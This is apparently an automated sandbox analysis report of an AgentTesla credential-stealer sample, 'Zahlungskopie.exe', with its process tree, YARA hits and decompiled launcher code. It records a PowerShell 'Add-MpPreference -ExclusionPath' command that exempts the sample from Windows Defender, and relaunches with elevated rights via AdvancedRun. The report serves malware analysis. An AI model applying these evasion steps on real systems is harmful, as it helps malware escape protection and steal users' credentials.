Mar 2, 2021 20:08:57.827697039 CET | 99.86.159.34 | 443 | 192.168.2.4 | 49734 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad

Certificate chain:
Subject | Issuer | Not Before | Not After
CN=*.liverpoolfc.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Fri Feb 12 01:00:00 CET 2021 | Mon Mar 14 00:59:59 CET 2022
CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:08:46
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Users\user\Desktop\Zahlungskopie.exe'
                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                        File size:29744 bytes
                                                                                                                                                                                                                        MD5 hash:9615A1C5BC0707A4248B1F138B834C2E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:07
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:91000 bytes
                                                                                                                                                                                                                        MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:09
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:91000 bytes
                                                                                                                                                                                                                        MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:14
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
                                                                                                                                                                                                                        Imagebase:0x1050000
                                                                                                                                                                                                                        File size:430592 bytes
                                                                                                                                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:14
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:15
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
                                                                                                                                                                                                                        Imagebase:0x1050000
                                                                                                                                                                                                                        File size:430592 bytes
                                                                                                                                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:15
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:22
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Imagebase:0x200000
                                                                                                                                                                                                                        File size:29744 bytes
                                                                                                                                                                                                                        MD5 hash:9615A1C5BC0707A4248B1F138B834C2E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:22
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:29744 bytes
                                                                                                                                                                                                                        MD5 hash:9615A1C5BC0707A4248B1F138B834C2E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:20:09:23
                                                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        Imagebase:0x830000
                                                                                                                                                                                                                        File size:29744 bytes
                                                                                                                                                                                                                        MD5 hash:9615A1C5BC0707A4248B1F138B834C2E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 015D8CEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015DF3CA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015DF3CA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 015D760D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015DB386,?,?,?,?,?), ref: 015DB447
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015DB386,?,?,?,?,?), ref: 015DB447
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,015D8D69,00000800,00000000,00000000), ref: 015D8F7A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,015D8D69,00000800,00000000,00000000), ref: 015D8F7A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 015D760D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 015D760D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 015D8CEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,015DF4E8,?,?,?,?), ref: 015DF55D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,015DF4E8,?,?,?,?), ref: 015DF55D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.731847266.00000000015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                          				char _v576;
                                                                                                                                                                                                                          				long _v580;
                                                                                                                                                                                                                          				intOrPtr _v1112;
                                                                                                                                                                                                                          				long _v1128;
                                                                                                                                                                                                                          				void _v1132;
                                                                                                                                                                                                                          				void* _v1136;
                                                                                                                                                                                                                          				void _v1658;
                                                                                                                                                                                                                          				char _v1660;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                          				int _t46;
                                                                                                                                                                                                                          				long _t49;
                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                          				intOrPtr* _t66;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t68;
                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t78 = _a4;
                                                                                                                                                                                                                          				E004099D4(_a4 + 0x28);
                                                                                                                                                                                                                          				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                          				_v12 = _t41;
                                                                                                                                                                                                                          				memset( &_v1132, 0, 0x228);
                                                                                                                                                                                                                          				_t84 = _t83 + 0xc;
                                                                                                                                                                                                                          				_v1136 = 0x22c;
                                                                                                                                                                                                                          				Process32FirstW(_v12,  &_v1136); // executed
                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                          					_t46 = Process32NextW(_v12,  &_v1136); // executed
                                                                                                                                                                                                                          					if(_t46 == 0) {
                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					E004090AF( &_v580);
                                                                                                                                                                                                                          					_t49 = _v1128;
                                                                                                                                                                                                                          					_v580 = _t49;
                                                                                                                                                                                                                          					_v52 = _v1112;
                                                                                                                                                                                                                          					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                                                                                                                                                          					_v8 = _t50;
                                                                                                                                                                                                                          					if(_t50 != 0) {
                                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                                          						_v1660 = 0;
                                                                                                                                                                                                                          						memset( &_v1658, 0, 0x208);
                                                                                                                                                                                                                          						_t85 = _t84 + 0xc;
                                                                                                                                                                                                                          						E004098F9(_t78, _v8,  &_v1660);
                                                                                                                                                                                                                          						if(_v1660 != 0) {
                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                          							E0040920A( &_v576,  &_v1660);
                                                                                                                                                                                                                          							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                                                                                                                                          							_t84 = _t85 + 0x14;
                                                                                                                                                                                                                          							CloseHandle(_v8);
                                                                                                                                                                                                                          							_t78 = _a4;
                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                          							E004099ED(_t78 + 0x28,  &_v580);
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v16 = 0x104;
                                                                                                                                                                                                                          						if( *0x41c8e0 == 0) {
                                                                                                                                                                                                                          							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                                          								 *0x41c8e0 = 1;
                                                                                                                                                                                                                          								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t66 =  *0x41c8e4;
                                                                                                                                                                                                                          						if(_t66 != 0) {
                                                                                                                                                                                                                          							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                                                                                                                                                          					_v8 = _t71;
                                                                                                                                                                                                                          					if(_t71 == 0) {
                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return CloseHandle(_v12);
                                                                                                                                                                                                                          			}


                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040962E
                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004096C6
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                                                                                                                          • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                                                                                                                          • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 239888749-1740548384
                                                                                                                                                                                                                          • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                                                                          • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00401C26(long _a4) {
                                                                                                                                                                                                                          				struct _SHELLEXECUTEINFOW _v68;
                                                                                                                                                                                                                          				void _v582;
                                                                                                                                                                                                                          				char _v584;
                                                                                                                                                                                                                          				void _v1110;
                                                                                                                                                                                                                          				char _v1112;
                                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                                          				int _t36;
                                                                                                                                                                                                                          				int _t41;
                                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                                          				long _t44;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t44 = 0;
                                                                                                                                                                                                                          				_t23 = GetCurrentProcessId();
                                                                                                                                                                                                                          				_v584 = 0;
                                                                                                                                                                                                                          				memset( &_v582, 0, 0x1fe);
                                                                                                                                                                                                                          				_v1112 = 0;
                                                                                                                                                                                                                          				memset( &_v1110, 0, 0x208);
                                                                                                                                                                                                                          				E00404AD9( &_v1112);
                                                                                                                                                                                                                          				_push(_t23);
                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                                                                          				_push(L"/SpecialRun %I64x %d");
                                                                                                                                                                                                                          				_push(0xff);
                                                                                                                                                                                                                          				_push( &_v584);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				memset( &(_v68.fMask), 0, 0x38);
                                                                                                                                                                                                                          				_v68.lpFile =  &_v1112;
